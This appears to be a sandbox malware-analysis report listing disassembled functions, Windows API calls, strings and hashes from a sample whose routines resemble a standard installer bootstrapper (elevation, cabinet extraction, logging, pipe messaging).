Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: bb4307ea8f3e938931e7509bd44c7c6f727901230e4312ef68d5e76f3749f317
Instruction ID: 7b6d14ef519459d46cf848827d6faa571eceb4ffc63b406d5b05352fcad950af
Opcode Fuzzy Hash: bb4307ea8f3e938931e7509bd44c7c6f727901230e4312ef68d5e76f3749f317
Instruction Fuzzy Hash: 3021393A80821AB7DB615790CC42FAE7F6CAF11720F20019FF900B61C0DB785E00DA99

Function 004E5BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,0050B500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,004E67DE,?,00000001,?,0050B4A0), ref: 004E5C45

Strings

Failed to copy target product code., xrefs: 004E5D78
Failed to plan action for target product., xrefs: 004E5CF0
Failed grow array of ordered patches., xrefs: 004E5CDE
Failed to insert execute action., xrefs: 004E5C9A
feclient.dll, xrefs: 004E5C3B, 004E5D65

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
API String ID: 1825529933-3477540455
Opcode ID: ab9407bd6719668dffdedcd840cbfbcf95ebe879c9cb02e0337c887b3b725c89
Instruction ID: d14d0e8038d3b6934f057a9774b4ac8ab3080e51eae9d08b4a8c24f335912db5
Opcode Fuzzy Hash: ab9407bd6719668dffdedcd840cbfbcf95ebe879c9cb02e0337c887b3b725c89
Instruction Fuzzy Hash: 728136B560078A9FCB14CF59C890AAA77E5FF08329F21856AEC158B352C774EC51CFA4

Function 004FCAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004FD262,00000000,00000000,00000000,00000000,00000000,004F2F1D), ref: 004FCB2F
__fassign.LIBCMT ref: 004FCBAA
__fassign.LIBCMT ref: 004FCBC5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 004FCBEB
WriteFile.KERNEL32(?,00000000,00000000,004FD262,00000000,?,?,?,?,?,?,?,?,?,004FD262,00000000), ref: 004FCC0A
WriteFile.KERNEL32(?,00000000,00000001,004FD262,00000000,?,?,?,?,?,?,?,?,?,004FD262,00000000), ref: 004FCC43

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 691fd5d2e9dd774f8eb769d0073b7ebc0fee2bf406e0323e60ef46cb898f305a
Instruction ID: bced54463205295139b84681e971c2310ef34c734bf6b0d12dcffdd5f1a4b3dd
Opcode Fuzzy Hash: 691fd5d2e9dd774f8eb769d0073b7ebc0fee2bf406e0323e60ef46cb898f305a
Instruction Fuzzy Hash: 3E51E271A0024D9FEB10CFA8DD85AEEBBF8EF09300F14411BE655E7291E734A945CBA5

Function 004E9279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,004D7113,000000B8,0000001C,00000100), ref: 004E92A4
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0050B4B8,000000FF,?,?,?,004D7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 004E932E

Strings

Failed to initialize update bundle., xrefs: 004E93D1
BA aborted detect forward compatible bundle., xrefs: 004E9398
comres.dll, xrefs: 004E93B0
detect.cpp, xrefs: 004E938E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
API String ID: 1825529933-439563586
Opcode ID: 44cc292d366a64a901695b08c12b48e4f3e5ce8dbda70398b4f2b8e8e1430983
Instruction ID: 7ba8957b04488a37cd6de80fa0714c9192d20f5c7a573c8011a5d162d29b7a97
Opcode Fuzzy Hash: 44cc292d366a64a901695b08c12b48e4f3e5ce8dbda70398b4f2b8e8e1430983
Instruction Fuzzy Hash: DB51E070600251BBDF159F66CC81EAAB766FF05312F1042AAF9249A2E1C735EC60DB98

Function 004DD437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,0050B500,?,00000001,000000FF,?,?,76C1B390,00000000,00000001,00000000,?,004D74E6), ref: 004DD560

Strings

elevation.cpp, xrefs: 004DD46B
Failed to create pipe and cache pipe., xrefs: 004DD4BD
Failed to create pipe name and client token., xrefs: 004DD4A1
UX aborted elevation requirement., xrefs: 004DD475
Failed to elevate., xrefs: 004DD542
Failed to connect to elevated child process., xrefs: 004DD549

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: 346b0183f36bd4faf940813c4cca390ab55035b30feb589be4add16503720379
Instruction ID: 28055a7de1487d5dc5323cbcee18afdef1e18ff13ed7d355243525488a0d6dff
Opcode Fuzzy Hash: 346b0183f36bd4faf940813c4cca390ab55035b30feb589be4add16503720379
Instruction Fuzzy Hash: 7C315B72E44625BBE721A664DC76FBAB75CAF00328F10421BF904A6381DB69AD4082DD

Function 00500523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0052B5FC,00000000,?,?,?,004D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,004C54FA,?), ref: 00500533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0052B5F4,?,004D4207,00000000,Setup), ref: 005005D7
GetLastError.KERNEL32(?,004D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,004C54FA,?,?,?), ref: 005005E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,004C54FA,?), ref: 00500621

Part of subcall function 004C2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 004C2F09

LeaveCriticalSection.KERNEL32(0052B5FC,?,?,0052B5F4,?,004D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,004C54FA,?), ref: 0050067A

Strings

logutil.cpp, xrefs: 00500606

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: fd2d947ecd9c598286c26ce9ddd230898a8a0fa8926b00aebe8fd97c6563711d
Instruction ID: 424b34bbff14ff0479e4b44a8fc33d38f9937c57eeb30cbeb03ac07f9a9e7740
Opcode Fuzzy Hash: fd2d947ecd9c598286c26ce9ddd230898a8a0fa8926b00aebe8fd97c6563711d
Instruction Fuzzy Hash: DE31C631A0062AFBEB219F619D85F6E7F69FF41754F040129F901AB1E0D776CD20ABA4

Function 004E398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004E39F4

Strings

Failed to append property string part., xrefs: 004E3A68
%s%="%s", xrefs: 004E3A27
Failed to format property value., xrefs: 004E3A7D
Failed to format property string part., xrefs: 004E3A6F
Failed to escape string., xrefs: 004E3A76

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: a3525faf0002aaa7bc8d1aa5cdaa734acdea488097bfaa9611193e51c7755565
Instruction ID: 21f9f896be64e32959ca779b609017f197137dc95c8ea5fa24613efacb442f3a
Opcode Fuzzy Hash: a3525faf0002aaa7bc8d1aa5cdaa734acdea488097bfaa9611193e51c7755565
Instruction Fuzzy Hash: 73310572800159AFDB129F9ACC49EAEBB68EF00707F00416FF81167251D7799F50CB98

Function 005041E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0050432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,004DA063,00000001), ref: 00504203
GetLastError.KERNEL32(00000002,?,0050432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,004DA063,00000001,000007D0,00000001,00000001,00000003), ref: 00504212
MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0050432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,004DA063,00000001), ref: 005042A6
GetLastError.KERNEL32(?,0050432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,004DA063,00000001,000007D0,00000001), ref: 005042B0

Part of subcall function 00504440: FindFirstFileW.KERNEL32(004E923A,?,00000100,00000000,00000000), ref: 0050447B
Part of subcall function 00504440: FindClose.KERNEL32(00000000), ref: 00504487

Strings

\, xrefs: 00504265
fileutil.cpp, xrefs: 005042CF

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: File$ErrorFindLastMove$CloseFirst
String ID: \$fileutil.cpp
API String ID: 3479031965-1689471480
Opcode ID: 0476c6e8f20c1edc5cd452acb2c2ca27ddb95f083718da60034a9d741bd49f8b
Instruction ID: f40c579010d59c9fc2e2f51d4767fdd539806d4e79fdf7876eb23635f323abdc
Opcode Fuzzy Hash: 0476c6e8f20c1edc5cd452acb2c2ca27ddb95f083718da60034a9d741bd49f8b
Instruction Fuzzy Hash: F531D4BEB0122797DB219E95CC51A6F7E69BFA1760F114039FE049B290D7708D40DAD0

Function 004C732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,004C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 004C733E
LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,004C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 004C741D

Strings

*****, xrefs: 004C73D9, 004C73E6
Failed to format value '%ls' of variable: %ls, xrefs: 004C73E7
Failed to get variable: %ls, xrefs: 004C737F
Failed to get unformatted string., xrefs: 004C73AE
Failed to get value as string for variable: %ls, xrefs: 004C740C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-2873099529
Opcode ID: 8ce5e953e63d9b5260b82d737930b2f3e9f30cb3c555d9b8901a41f79aaeffc5
Instruction ID: 57b6236e0f063b6bfed6ab9431226c3b7e8f3c4e891136b2831aeef209a9d06e
Opcode Fuzzy Hash: 8ce5e953e63d9b5260b82d737930b2f3e9f30cb3c555d9b8901a41f79aaeffc5
Instruction Fuzzy Hash: 7731903A90456AFBDF225B50CC09F9E7E64FF14361F10426AFC00662A0D379A951DBD8

Function 005032F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00503309
SysAllocString.OLEAUT32(?), ref: 00503325
VariantClear.OLEAUT32(?), ref: 005033AC
SysFreeString.OLEAUT32(00000000), ref: 005033B7

Strings

xmlutil.cpp, xrefs: 0050333C
`5w, xrefs: 005033B7

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `5w$xmlutil.cpp
API String ID: 760788290-26783885
Opcode ID: 6c1775c70d1666d3ddafa8cc6cce87399628d105e2aa8f6eea7c666edf4fa1c7
Instruction ID: 07a5fc097ef51b69e49eca2729c28a6c86a1f59a311885724c47c8d7b6982a53
Opcode Fuzzy Hash: 6c1775c70d1666d3ddafa8cc6cce87399628d105e2aa8f6eea7c666edf4fa1c7
Instruction Fuzzy Hash: 3D218035901219AFCB21DF98C888EEEBFBDBF45B15F154958F901AB250DB319E04DB90

Function 004D8DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 004D8E37
GetLastError.KERNEL32 ref: 004D8E41
SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 004D8EA1

Strings

Failed to allocate administrator SID., xrefs: 004D8E1D
Failed to initialize ACL., xrefs: 004D8E6F
cache.cpp, xrefs: 004D8E65

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: c4e567d18558b908f539958d316d6d61d1909c6e2ab2014079b63472b463fcb9
Instruction ID: 5d28a50815081da5512e1c7c67519dbc13cc61d8849abeff63df19130ec18d3d
Opcode Fuzzy Hash: c4e567d18558b908f539958d316d6d61d1909c6e2ab2014079b63472b463fcb9
Instruction Fuzzy Hash: 1921D836E40214B7EB309E959C99FAFBB69FB44B10F51416FF904FB380DA749E009A94

Function 004C4212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,004D4028,00000001,feclient.dll,?,00000000,?,?,?,004C4B12), ref: 004C424D
GetLastError.KERNEL32(?,?,004D4028,00000001,feclient.dll,?,00000000,?,?,?,004C4B12,?,?,0050B488,?,00000001), ref: 004C4259
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,004D4028,00000001,feclient.dll,?,00000000,?,?,?,004C4B12,?), ref: 004C4294
GetLastError.KERNEL32(?,?,004D4028,00000001,feclient.dll,?,00000000,?,?,?,004C4B12,?,?,0050B488,?,00000001), ref: 004C429E

Strings

dirutil.cpp, xrefs: 004C42C2
crypt32.dll, xrefs: 004C4216

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: crypt32.dll$dirutil.cpp
API String ID: 152501406-1104880720
Opcode ID: e75156941887738e75dbde738452d00fb75fe7507856d66f1fa4a93b289c87a0
Instruction ID: ce6e3b9290c071235d9d74877479c3919dea8cce4371bbd1e0be4bfeae480b62
Opcode Fuzzy Hash: e75156941887738e75dbde738452d00fb75fe7507856d66f1fa4a93b289c87a0
Instruction Fuzzy Hash: F611DB3FD01637A7A7615AD98996F5FBA58AF517E071101AFFD00E7310E724DC0086E8

Function 004E0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 004E0BDE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004E0BFD
GetLastError.KERNEL32 ref: 004E0C07

Strings

Unexpected call to CabWrite()., xrefs: 004E0BC1
cabextract.cpp, xrefs: 004E0C2B
Failed to write during cabinet extraction., xrefs: 004E0C35

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: af72a8ac2f9b7e4f0cf8d9e74cfef73d4e4678f3bb245db4611fff8a290a20d7
Instruction ID: 97eccfebef85db5902f745fa01267f1529ee3bb7883fe1f0e1c2faf883f24d29
Opcode Fuzzy Hash: af72a8ac2f9b7e4f0cf8d9e74cfef73d4e4678f3bb245db4611fff8a290a20d7
Instruction Fuzzy Hash: BB21317A500201ABCB15CF5EC885DAA3BB8FF84321B21424AFE24CB345E6B5ED40CB64

Function 004C9AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004C9AFB
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,004CA8B4,00000100,000002C0,000002C0,00000100), ref: 004C9B10
GetLastError.KERNEL32(?,004CA8B4,00000100,000002C0,000002C0,00000100), ref: 004C9B1B

Strings

Failed to set variable., xrefs: 004C9B7A
Failed to format variable string., xrefs: 004C9B06
Failed while searching directory search: %ls, for path: %ls, xrefs: 004C9B54

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: e8bfe4c638eff93cf28205930e080f78a1da041e1b79e3ac6494d8e9aa1976d2
Instruction ID: c9b7edac36ea71a254e363b1417c6cf4eb7c30a265db57bfa9abd5cba1233fec
Opcode Fuzzy Hash: e8bfe4c638eff93cf28205930e080f78a1da041e1b79e3ac6494d8e9aa1976d2
Instruction Fuzzy Hash: BF110A3A940536BBDB611694AC8AF6EF618FF10364F20031AF91076290A7796D10A6D9

Function 004E0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004E0CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004E0CD6
SetFileTime.KERNEL32(?,?,?,?), ref: 004E0CE9
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004E08B1,?,?), ref: 004E0CF8

Strings

Invalid operation for this state., xrefs: 004E0C9D
cabextract.cpp, xrefs: 004E0C93

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: b00de4304b443f07c1a474e4c093377a316435767143f622473175fc73350245
Instruction ID: 42476bd98f025151c6da0e81096342ea87b0a4ccfe43e8545469204a164770c5
Opcode Fuzzy Hash: b00de4304b443f07c1a474e4c093377a316435767143f622473175fc73350245
Instruction Fuzzy Hash: 3C21F37280021AABC7109FA9DC499FEBBBDFF043217104217F864D62D0D3B8EA91CB94

Function 004D4A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,004D539D), ref: 004D4AC3

Strings

pipe.cpp, xrefs: 004D4AFB
Failed to allocate message to write., xrefs: 004D4AA2
crypt32.dll, xrefs: 004D4A7D
Failed to write message type to pipe., xrefs: 004D4B05

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
API String ID: 3934441357-606776022
Opcode ID: d33ecf12bb823b9c34cba795439d5c8c9235d25ce6322dc0c0260e4e4ec70f2e
Instruction ID: 50d6459e20215a409c871402aa7021f16aa3cff8fe3d9d580e1f439b8c58027e
Opcode Fuzzy Hash: d33ecf12bb823b9c34cba795439d5c8c9235d25ce6322dc0c0260e4e4ec70f2e
Instruction Fuzzy Hash: A211CD72A80129BBDB21CF85DD15EDF7BA8EB80750F110067FD00B6340D734AE50DAA8

Function 004D4642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
